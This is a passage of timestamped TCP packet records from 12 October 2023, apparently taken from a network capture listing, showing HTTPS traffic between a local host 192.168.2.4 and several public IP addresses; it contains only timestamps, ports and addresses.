                                                                                Oct 12, 2023 17:42:16.290277958 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.290281057 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.290324926 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.290370941 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.290411949 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.290471077 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.290870905 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.290919065 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.290930986 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.296051025 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.296088934 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.296103001 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.296108007 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.296149969 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.301662922 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.307164907 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.307229996 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.307236910 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.312320948 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.312599897 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.312606096 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.315474987 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.315490961 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.315511942 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.315613985 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.315656900 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.315673113 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.315680981 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.315711975 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.317722082 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.317790985 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.317795992 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.322763920 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.322778940 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.322813034 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.322868109 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.322891951 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.322909117 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.323189974 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.323240042 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.323245049 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.328608036 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.328691959 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.328696012 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.339399099 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.339431047 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.339473963 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.339478970 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.339526892 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.344846010 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.348084927 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.348114014 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.348186970 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.348206997 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.348229885 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.350307941 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.350424051 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.350436926 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.373012066 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.389132023 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.405045033 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.431365013 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.431572914 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.431602001 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.431732893 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.437551022 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.437741041 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.438050985 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.438070059 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.442343950 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.442356110 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.442394018 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.442401886 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.442461967 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.442460060 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.442516088 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.442537069 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.442575932 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.444794893 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.444847107 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.444861889 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.444873095 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.444941044 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.449912071 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.454720020 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.454794884 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.454798937 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.459501028 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.459592104 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.459594965 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.463983059 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.464086056 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.464090109 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.468401909 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.468476057 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.468481064 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.469374895 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.469389915 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.469423056 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.469449043 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.469501019 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.469544888 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.469559908 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.469599962 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.470561028 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.470571995 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.470607042 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.470649958 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.470679045 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.470698118 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.470721960 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.473100901 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.473130941 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.474217892 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.474312067 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.474323034 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.474383116 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.474647045 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.474663973 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.476556063 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.476588011 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.476636887 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.476649046 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.476690054 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.480082035 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.480113029 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.480200052 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.480396986 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.480968952 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.480978012 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.484168053 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.484225035 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.484230995 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.486829996 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.497332096 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.497354984 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.497473955 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.497543097 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.497613907 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.500794888 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.500875950 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.500894070 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.500963926 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.506133080 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.506141901 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.506153107 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.506221056 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.506228924 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.506285906 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.515192032 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.515235901 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.515450001 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.515702009 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.515770912 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.521608114 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.605585098 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.608159065 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.608213902 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.608278036 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.608310938 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.608320951 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.608365059 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.608385086 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.608407021 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.608447075 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.608454943 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.608721018 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.608758926 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.608764887 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.608773947 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.608818054 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.609348059 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.609410048 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.609445095 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.609457016 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.609479904 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.609522104 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.609529018 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.609589100 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.609652996 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.609683037 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.609694004 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.609700918 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.609735012 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.609741926 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.609764099 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.609776020 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.609783888 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.609823942 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.610356092 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.610428095 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.610474110 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.610486984 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.610505104 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.610578060 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.610615969 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.610622883 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.611357927 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.611403942 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.611413956 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.611438036 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.611465931 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.611485958 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.611490965 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.611500025 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.611519098 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.611527920 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.611563921 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.611571074 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.612411976 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.612448931 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.612473965 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.612484932 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.612525940 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.612535954 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.612570047 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.612577915 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.612586021 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.612629890 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.612636089 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.613154888 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.613260031 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.613297939 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.613307953 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.613317013 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.613358021 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.613413095 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.613451958 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.613456964 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.613466024 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.613512993 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.613554001 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.613646984 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.613689899 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.614267111 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.614326000 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.614370108 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.614382029 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.614989996 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.615022898 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.615051985 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.615058899 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.615072012 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.615111113 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.615119934 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.615159988 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.615916967 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.615968943 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.616014957 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.616019964 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.616873026 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.616919041 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.616921902 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.616935015 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.616981983 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.616986990 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.617820024 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.617881060 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.617887020 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.617901087 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.617961884 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.626995087 CEST49760443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.627012968 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.627294064 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.631746054 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.631786108 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.634778023 CEST49760443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.634843111 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.638556004 CEST49760443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.649049044 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.649072886 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.686439991 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.720746994 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.720808029 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.720901012 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.723408937 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.723434925 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.727431059 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.727468967 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.728456974 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.728480101 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.786261082 CEST49753443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:16.813011885 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.815045118 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.815058947 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.815396070 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.818706989 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.818774939 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.819168091 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:16.826457977 CEST44349753209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:16.862452984 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:16.958733082 CEST44349753209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:16.958863974 CEST44349753209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:16.958957911 CEST49753443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:16.960158110 CEST49753443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:16.960201025 CEST44349753209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:16.977407932 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.977454901 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.977535963 CEST49760443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.977539062 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.977555990 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.977612019 CEST49760443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.977617025 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.977823019 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.977860928 CEST49760443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.977865934 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.978585005 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.978652000 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.978652954 CEST49760443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.978662014 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.978696108 CEST49760443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.979123116 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.979243040 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.979280949 CEST49760443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.979285955 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.980357885 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.980381012 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.980403900 CEST49760443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.980408907 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.980446100 CEST49760443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.980449915 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.980462074 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.980504990 CEST49760443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:17.009651899 CEST49760443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:17.009669065 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:17.058720112 CEST44349762104.18.11.207192.168.2.4
